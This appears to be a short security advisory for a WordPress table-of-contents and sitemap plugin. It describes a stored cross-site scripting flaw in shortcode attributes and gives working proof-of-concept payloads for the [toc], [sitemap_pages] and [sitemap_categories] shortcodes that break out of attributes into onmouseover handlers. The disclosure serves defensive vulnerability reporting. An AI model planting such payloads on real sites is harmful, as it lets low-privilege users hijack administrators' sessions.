The plugin does not validate and escape some of its shortcode attributes before outputting them back in the page, which could allow users with a role as low as contributor to perform Stored Cross-Site Scripting attacks which could be used against high privilege users such as admins.
[toc heading_levels='1' class='" onmouseover="alert(/XSS/)']
<h1>XSS</h1>
content
<h1>XSS</h1>
content
<h1>XSS</h1>
content
<h1>XSS</h1>
content
Note: it is only generated by the shortcode if there is content for the TOC, so it must be used together, and it needs at least 4 header tags to work.
[sitemap_pages heading='1" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//']
[sitemap_categories heading='1" style=position:absolute;top:0;left:0;max-width:9999px;width:9999px;height:9999px onmouseover=alert(/XSS/)//']